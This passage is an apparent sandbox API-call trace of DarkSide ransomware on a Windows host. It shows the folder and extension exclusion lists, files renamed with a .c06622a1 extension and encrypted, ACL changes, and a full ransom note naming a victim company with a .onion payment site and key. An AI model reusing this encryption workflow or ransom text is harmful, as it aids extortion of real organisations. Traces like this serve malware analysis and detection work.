0x3 [0158.411] _wcsicmp (_Str1="exe", _Str2="xls") returned -19 [0158.411] wcslen (_String="exe") returned 0x3 [0158.411] _wcsicmp (_Str1="hlp", _Str2="xls") returned -16 [0158.411] wcslen (_String="hlp") returned 0x3 [0158.411] _wcsicmp (_Str1="icl", _Str2="xls") returned -15 [0158.411] wcslen (_String="icl") returned 0x3 [0158.411] _wcsicmp (_Str1="icns", _Str2="xls") returned -15 [0158.411] wcslen (_String="icns") returned 0x4 [0158.411] _wcsicmp (_Str1="ico", _Str2="xls") returned -15 [0158.411] wcslen (_String="ico") returned 0x3 [0158.411] _wcsicmp (_Str1="ics", _Str2="xls") returned -15 [0158.412] wcslen (_String="ics") returned 0x3 [0158.412] _wcsicmp (_Str1="idx", _Str2="xls") returned -15 [0158.412] wcslen (_String="idx") returned 0x3 [0158.412] _wcsicmp (_Str1="ldf", _Str2="xls") returned -12 [0158.412] wcslen (_String="ldf") returned 0x3 [0158.412] _wcsicmp (_Str1="lnk", _Str2="xls") returned -12 [0158.412] wcslen (_String="lnk") returned 0x3 [0158.412] _wcsicmp (_Str1="mod", _Str2="xls") returned -11 [0158.412] wcslen (_String="mod") returned 0x3 [0158.412] _wcsicmp (_Str1="mpa", _Str2="xls") returned -11 [0158.412] wcslen (_String="mpa") returned 0x3 [0158.412] _wcsicmp (_Str1="msc", _Str2="xls") returned -11 [0158.412] wcslen (_String="msc") returned 0x3 [0158.412] _wcsicmp (_Str1="msp", _Str2="xls") returned -11 [0158.412] wcslen (_String="msp") returned 0x3 [0158.412] _wcsicmp (_Str1="msstyles", _Str2="xls") returned -11 [0158.412] wcslen (_String="msstyles") returned 0x8 [0158.412] _wcsicmp (_Str1="msu", _Str2="xls") returned -11 [0158.412] wcslen (_String="msu") returned 0x3 [0158.412] _wcsicmp (_Str1="nls", _Str2="xls") returned -10 [0158.412] wcslen (_String="nls") returned 0x3 [0158.412] _wcsicmp (_Str1="nomedia", _Str2="xls") returned -10 [0158.412] wcslen (_String="nomedia") returned 0x7 [0158.412] _wcsicmp (_Str1="ocx", _Str2="xls") returned -9 [0158.412] wcslen (_String="ocx") returned 0x3 [0158.412] _wcsicmp (_Str1="prf", _Str2="xls") returned -8 [0158.412] wcslen (_String="prf") returned 0x3 [0158.412] _wcsicmp (_Str1="ps1", _Str2="xls") returned -8 [0158.412] wcslen (_String="ps1") returned 0x3 [0158.412] _wcsicmp (_Str1="rom", _Str2="xls") returned -6 [0158.412] wcslen (_String="rom") returned 0x3 [0158.412] _wcsicmp (_Str1="rtp", _Str2="xls") returned -6 [0158.412] wcslen (_String="rtp") returned 0x3 [0158.412] _wcsicmp (_Str1="scr", _Str2="xls") returned -5 [0158.412] wcslen (_String="scr") returned 0x3 [0158.412] _wcsicmp (_Str1="shs", _Str2="xls") returned -5 [0158.413] wcslen (_String="shs") returned 0x3 [0158.413] _wcsicmp (_Str1="spl", _Str2="xls") returned -5 [0158.413] wcslen (_String="spl") returned 0x3 [0158.413] _wcsicmp (_Str1="sys", _Str2="xls") returned -5 [0158.413] wcslen (_String="sys") returned 0x3 [0158.413] _wcsicmp (_Str1="theme", _Str2="xls") returned -4 [0158.413] wcslen (_String="theme") returned 0x5 [0158.413] _wcsicmp (_Str1="themepack", _Str2="xls") returned -4 [0158.413] wcslen (_String="themepack") returned 0x9 [0158.413] _wcsicmp (_Str1="wpx", _Str2="xls") returned -1 [0158.413] wcslen (_String="wpx") returned 0x3 [0158.413] _wcsicmp (_Str1="lock", _Str2="xls") returned -12 [0158.413] wcslen (_String="lock") returned 0x4 [0158.413] _wcsicmp (_Str1="key", _Str2="xls") returned -13 [0158.413] wcslen (_String="key") returned 0x3 [0158.413] _wcsicmp (_Str1="hta", _Str2="xls") returned -16 [0158.413] wcslen (_String="hta") returned 0x3 [0158.413] _wcsicmp (_Str1="msi", _Str2="xls") returned -11 [0158.413] wcslen (_String="msi") returned 0x3 [0158.413] _wcsicmp (_Str1="pdb", _Str2="xls") returned -8 [0158.413] wcslen (_String="pdb") returned 0x3 [0158.413] _wcsicmp (_Str1="sqlite", _Str2="xls") returned -5 [0158.413] wcslen (_String="sqlite") returned 0x6 [0158.413] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac")) returned 0x10 [0158.413] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3270078 [0158.413] wcscpy (in: _Dest=0x3270078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" [0158.413] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac") returned 0x46 [0158.413] wcscpy (in: _Dest=0x3270106, _Source="2Pii2h.xls" | out: _Dest="2Pii2h.xls") returned="2Pii2h.xls" [0158.413] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\2Pii2h.xls", dwFileAttributes=0x80) returned 1 [0158.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\2Pii2h.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\2pii2h.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0158.414] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.414] ReadFile (in: hFile=0x1e0, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0158.415] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0xc765de2d [0158.415] RtlComputeCrc32 (PartialCrc=0xde2d, Buffer=0x32e724, Length=0x80) returned 0x9986a4de [0158.415] RtlComputeCrc32 (PartialCrc=0xa4de, Buffer=0x32e724, Length=0x80) returned 0xb03ef4df [0158.415] RtlComputeCrc32 (PartialCrc=0xf4df, Buffer=0x32e724, Length=0x80) returned 0x3565ad2c [0158.415] RtlComputeCrc32 (PartialCrc=0xad2c, Buffer=0x32e724, Length=0x80) returned 0xa1a71d8c [0158.415] CloseHandle (hObject=0x1e0) returned 1 [0158.415] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3280080 [0158.415] wcscpy (in: _Dest=0x3280080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\2Pii2h.xls" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\2Pii2h.xls") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\2Pii2h.xls" [0158.415] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\2Pii2h.xls") returned 0x51 [0158.415] wcscpy (in: _Dest=0x3280122, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.415] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\2Pii2h.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\2pii2h.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\2Pii2h.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\2pii2h.xls.c06622a1"), dwFlags=0x8) returned 1 [0158.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\2Pii2h.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\2pii2h.xls.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e0 [0158.418] CreateIoCompletionPort (FileHandle=0x1e0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.418] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3750020 [0158.425] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x61bde197 [0158.425] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc50d92 [0158.425] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x62679527 [0158.425] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2f3bb081 [0158.425] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x337de77 [0158.425] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1edfc5ed [0158.425] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xa8ffeab [0158.425] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x75ad06d9 [0158.428] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3750094, Length=0x80) returned 0x5fa90302 [0158.428] RtlComputeCrc32 (PartialCrc=0x302, Buffer=0x3750094, Length=0x80) returned 0x4234273a [0158.428] RtlComputeCrc32 (PartialCrc=0x273a, Buffer=0x3750094, Length=0x80) returned 0x8e47b2f6 [0158.428] RtlComputeCrc32 (PartialCrc=0xb2f6, Buffer=0x3750094, Length=0x80) returned 0xfc2bbc4f [0158.428] RtlComputeCrc32 (PartialCrc=0xbc4f, Buffer=0x3750094, Length=0x80) returned 0xb58e1210 [0158.428] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0158.428] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3270078) returned 1 [0158.429] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3280080) returned 1 [0158.430] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x169eaae0, ftCreationTime.dwHighDateTime=0x1d5e08f, ftLastAccessTime.dwLowDateTime=0x950df600, ftLastAccessTime.dwHighDateTime=0x1d5e149, ftLastWriteTime.dwLowDateTime=0x950df600, ftLastWriteTime.dwHighDateTime=0x1d5e149, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="88lX_mh5lpPm", cAlternateFileName="88LX_M~1")) returned 1 [0158.430] _wcsicmp (_Str1="$recycle.bin", _Str2="88lX_mh5lpPm") returned -20 [0158.430] wcslen (_String="$recycle.bin") returned 0xc [0158.430] _wcsicmp (_Str1="config.msi", _Str2="88lX_mh5lpPm") returned 43 [0158.430] wcslen (_String="config.msi") returned 0xa [0158.430] _wcsicmp (_Str1="$windows.~bt", _Str2="88lX_mh5lpPm") returned -20 [0158.430] wcslen (_String="$windows.~bt") returned 0xc [0158.430] _wcsicmp (_Str1="$windows.~ws", _Str2="88lX_mh5lpPm") returned -20 [0158.431] wcslen (_String="$windows.~ws") returned 0xc [0158.431] _wcsicmp (_Str1="windows", _Str2="88lX_mh5lpPm") returned 63 [0158.431] wcslen (_String="windows") returned 0x7 [0158.431] _wcsicmp (_Str1="appdata", _Str2="88lX_mh5lpPm") returned 41 [0158.431] wcslen (_String="appdata") returned 0x7 [0158.431] _wcsicmp (_Str1="application data", _Str2="88lX_mh5lpPm") returned 41 [0158.431] wcslen (_String="application data") returned 0x10 [0158.431] _wcsicmp (_Str1="boot", _Str2="88lX_mh5lpPm") returned 42 [0158.431] wcslen (_String="boot") returned 0x4 [0158.431] _wcsicmp (_Str1="google", _Str2="88lX_mh5lpPm") returned 47 [0158.431] wcslen (_String="google") returned 0x6 [0158.431] _wcsicmp (_Str1="mozilla", _Str2="88lX_mh5lpPm") returned 53 [0158.431] wcslen (_String="mozilla") returned 0x7 [0158.431] _wcsicmp (_Str1="program files", _Str2="88lX_mh5lpPm") returned 56 [0158.431] wcslen (_String="program files") returned 0xd [0158.431] _wcsicmp (_Str1="program files (x86)", _Str2="88lX_mh5lpPm") returned 56 [0158.431] wcslen (_String="program files (x86)") returned 0x13 [0158.431] _wcsicmp (_Str1="programdata", _Str2="88lX_mh5lpPm") returned 56 [0158.431] wcslen (_String="programdata") returned 0xb [0158.431] _wcsicmp (_Str1="system volume information", _Str2="88lX_mh5lpPm") returned 59 [0158.431] wcslen (_String="system volume information") returned 0x19 [0158.431] _wcsicmp (_Str1="tor browser", _Str2="88lX_mh5lpPm") returned 60 [0158.431] wcslen (_String="tor browser") returned 0xb [0158.431] _wcsicmp (_Str1="windows.old", _Str2="88lX_mh5lpPm") returned 63 [0158.431] wcslen (_String="windows.old") returned 0xb [0158.431] _wcsicmp (_Str1="intel", _Str2="88lX_mh5lpPm") returned 49 [0158.431] wcslen (_String="intel") returned 0x5 [0158.431] _wcsicmp (_Str1="msocache", _Str2="88lX_mh5lpPm") returned 53 [0158.431] wcslen (_String="msocache") returned 0x8 [0158.431] _wcsicmp (_Str1="perflogs", _Str2="88lX_mh5lpPm") returned 56 [0158.431] wcslen (_String="perflogs") returned 0x8 [0158.431] _wcsicmp (_Str1="x64dbg", _Str2="88lX_mh5lpPm") returned 64 [0158.431] wcslen (_String="x64dbg") returned 0x6 [0158.431] _wcsicmp (_Str1="public", _Str2="88lX_mh5lpPm") returned 56 [0158.431] wcslen (_String="public") returned 0x6 [0158.431] _wcsicmp (_Str1="all users", _Str2="88lX_mh5lpPm") returned 41 [0158.432] wcslen (_String="all users") returned 0x9 [0158.432] _wcsicmp (_Str1="default", _Str2="88lX_mh5lpPm") returned 44 [0158.432] wcslen (_String="default") returned 0x7 [0158.432] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*" [0158.432] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*") returned 0x48 [0158.432] wcscpy (in: _Dest=0x32500f6, _Source="88lX_mh5lpPm" | out: _Dest="88lX_mh5lpPm") returned="88lX_mh5lpPm" [0158.432] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3270078 [0158.432] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3280080 [0158.432] wcscpy (in: _Dest=0x3270078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" [0158.432] GetNamedSecurityInfoW () returned 0x0 [0158.433] SetEntriesInAclW () returned 0x0 [0158.433] SetNamedSecurityInfoW () returned 0x0 [0158.437] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b0c8) returned 1 [0158.437] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e3ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0158.437] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm")) returned 1 [0158.437] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0158.437] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0158.438] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e3bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e3bc*=0x7ca, lpOverlapped=0x0) returned 1 [0158.438] CloseHandle (hObject=0x1a4) returned 1 [0158.439] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0158.439] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\88lx_mh5lppm")) returned 0x10 [0158.439] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\") returned="" [0158.439] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\") returned 0x54 [0158.439] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\88lX_mh5lpPm\\*", fInfoLevelId=0x0, lpFindFileData=0x32e61c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e61c) returned 0x154208 [0158.439] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x169eaae0, ftCreationTime.dwHighDateTime=0x1d5e08f, ftLastAccessTime.dwLowDateTime=0x8c222f60, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c222f60, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.440] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x986d8450, ftCreationTime.dwHighDateTime=0x1d5e04f, ftLastAccessTime.dwLowDateTime=0x5a839df0, ftLastAccessTime.dwHighDateTime=0x1d5e5a4, ftLastWriteTime.dwLowDateTime=0x5a839df0, ftLastWriteTime.dwHighDateTime=0x1d5e5a4, nFileSizeHigh=0x0, nFileSizeLow=0xdb01, dwReserved0=0x0, dwReserved1=0x0, cFileName="3-UD.ods", cAlternateFileName="")) returned 1 [0158.440] _wcsicmp (_Str1="3-UD.ods", _Str2="README.c06622a1.TXT") returned -63 [0158.440] wcsstr (_Str="3-UD.ods", _SubStr="README") returned 0x0 [0158.440] _wcsicmp (_Str1="autorun.inf", _Str2="3-UD.ods") returned 46 [0158.440] wcslen (_String="autorun.inf") returned 0xb [0158.440] _wcsicmp (_Str1="boot.ini", _Str2="3-UD.ods") returned 47 [0158.440] wcslen (_String="boot.ini") returned 0x8 [0158.440] _wcsicmp (_Str1="bootfont.bin", _Str2="3-UD.ods") returned 47 [0158.440] wcslen (_String="bootfont.bin") returned 0xc [0158.440] _wcsicmp (_Str1="bootsect.bak", _Str2="3-UD.ods") returned 47 [0158.440] wcslen (_String="bootsect.bak") returned 0xc [0158.440] _wcsicmp (_Str1="desktop.ini", _Str2="3-UD.ods") returned 49 [0158.440] wcslen (_String="desktop.ini") returned 0xb [0158.440] _wcsicmp (_Str1="iconcache.db", _Str2="3-UD.ods") returned 54 [0158.440] wcslen (_String="iconcache.db") returned 0xc [0158.440] _wcsicmp (_Str1="ntldr", _Str2="3-UD.ods") returned 59 [0158.440] wcslen (_String="ntldr") returned 0x5 [0158.440] _wcsicmp (_Str1="ntuser.dat", _Str2="3-UD.ods") returned 59 [0158.440] wcslen (_String="ntuser.dat") returned 0xa [0158.440] _wcsicmp (_Str1="ntuser.dat.log", _Str2="3-UD.ods") returned 59 [0158.440] wcslen (_String="ntuser.dat.log") returned 0xe [0158.440] _wcsicmp (_Str1="ntuser.ini", _Str2="3-UD.ods") returned 59 [0158.440] wcslen (_String="ntuser.ini") returned 0xa [0158.440] _wcsicmp (_Str1="thumbs.db", _Str2="3-UD.ods") returned 65 [0158.440] wcslen (_String="thumbs.db") returned 0x9 [0158.440] _wcsicmp (_Str1="386", _Str2="ods") returned -60 [0158.440] wcslen (_String="386") returned 0x3 [0158.440] _wcsicmp (_Str1="adv", _Str2="ods") returned -14 [0158.440] wcslen (_String="adv") returned 0x3 [0158.440] _wcsicmp (_Str1="ani", _Str2="ods") returned -14 [0158.440] wcslen (_String="ani") returned 0x3 [0158.441] _wcsicmp (_Str1="bat", _Str2="ods") returned -13 [0158.441] wcslen (_String="bat") returned 0x3 [0158.441] _wcsicmp (_Str1="bin", _Str2="ods") returned -13 [0158.441] wcslen (_String="bin") returned 0x3 [0158.441] _wcsicmp (_Str1="cab", _Str2="ods") returned -12 [0158.441] wcslen (_String="cab") returned 0x3 [0158.441] _wcsicmp (_Str1="cmd", _Str2="ods") returned -12 [0158.441] wcslen (_String="cmd") returned 0x3 [0158.441] _wcsicmp (_Str1="com", _Str2="ods") returned -12 [0158.441] wcslen (_String="com") returned 0x3 [0158.441] _wcsicmp (_Str1="cpl", _Str2="ods") returned -12 [0158.441] wcslen (_String="cpl") returned 0x3 [0158.441] _wcsicmp (_Str1="cur", _Str2="ods") returned -12 [0158.441] wcslen (_String="cur") returned 0x3 [0158.441] _wcsicmp (_Str1="deskthemepack", _Str2="ods") returned -11 [0158.441] wcslen (_String="deskthemepack") returned 0xd [0158.441] _wcsicmp (_Str1="diagcab", _Str2="ods") returned -11 [0158.441] wcslen (_String="diagcab") returned 0x7 [0158.441] _wcsicmp (_Str1="diagcfg", _Str2="ods") returned -11 [0158.441] wcslen (_String="diagcfg") returned 0x7 [0158.441] _wcsicmp (_Str1="diagpkg", _Str2="ods") returned -11 [0158.441] wcslen (_String="diagpkg") returned 0x7 [0158.441] _wcsicmp (_Str1="dll", _Str2="ods") returned -11 [0158.441] wcslen (_String="dll") returned 0x3 [0158.441] _wcsicmp (_Str1="drv", _Str2="ods") returned -11 [0158.441] wcslen (_String="drv") returned 0x3 [0158.441] _wcsicmp (_Str1="exe", _Str2="ods") returned -10 [0158.441] wcslen (_String="exe") returned 0x3 [0158.441] _wcsicmp (_Str1="hlp", _Str2="ods") returned -7 [0158.441] wcslen (_String="hlp") returned 0x3 [0158.441] _wcsicmp (_Str1="icl", _Str2="ods") returned -6 [0158.441] wcslen (_String="icl") returned 0x3 [0158.441] _wcsicmp (_Str1="icns", _Str2="ods") returned -6 [0158.441] wcslen (_String="icns") returned 0x4 [0158.441] _wcsicmp (_Str1="ico", _Str2="ods") returned -6 [0158.442] wcslen (_String="ico") returned 0x3 [0158.442] _wcsicmp (_Str1="ics", _Str2="ods") returned -6 [0158.442] wcslen (_String="ics") returned 0x3 [0158.442] _wcsicmp (_Str1="idx", _Str2="ods") returned -6 [0158.442] wcslen (_String="idx") returned 0x3 [0158.442] _wcsicmp (_Str1="ldf", _Str2="ods") returned -3 [0158.442] wcslen (_String="ldf") returned 0x3 [0158.442] _wcsicmp (_Str1="lnk", _Str2="ods") returned -3 [0158.442] wcslen (_String="lnk") returned 0x3 [0158.442] _wcsicmp (_Str1="mod", _Str2="ods") returned -2 [0158.442] wcslen (_String="mod") returned 0x3 [0158.442] _wcsicmp (_Str1="mpa", _Str2="ods") returned -2 [0158.442] wcslen (_String="mpa") returned 0x3 [0158.442] _wcsicmp (_Str1="msc", _Str2="ods") returned -2 [0158.442] wcslen (_String="msc") returned 0x3 [0158.442] _wcsicmp (_Str1="msp", _Str2="ods") returned -2 [0158.442] wcslen (_String="msp") returned 0x3 [0158.442] _wcsicmp (_Str1="msstyles", _Str2="ods") returned -2 [0158.442] wcslen (_String="msstyles") returned 0x8 [0158.442] _wcsicmp (_Str1="msu", _Str2="ods") returned -2 [0158.442] wcslen (_String="msu") returned 0x3 [0158.442] _wcsicmp (_Str1="nls", _Str2="ods") returned -1 [0158.442] wcslen (_String="nls") returned 0x3 [0158.442] _wcsicmp (_Str1="nomedia", _Str2="ods") returned -1 [0158.442] wcslen (_String="nomedia") returned 0x7 [0158.442] _wcsicmp (_Str1="ocx", _Str2="ods") returned -1 [0158.442] wcslen (_String="ocx") returned 0x3 [0158.442] _wcsicmp (_Str1="prf", _Str2="ods") returned 1 [0158.442] wcslen (_String="prf") returned 0x3 [0158.442] _wcsicmp 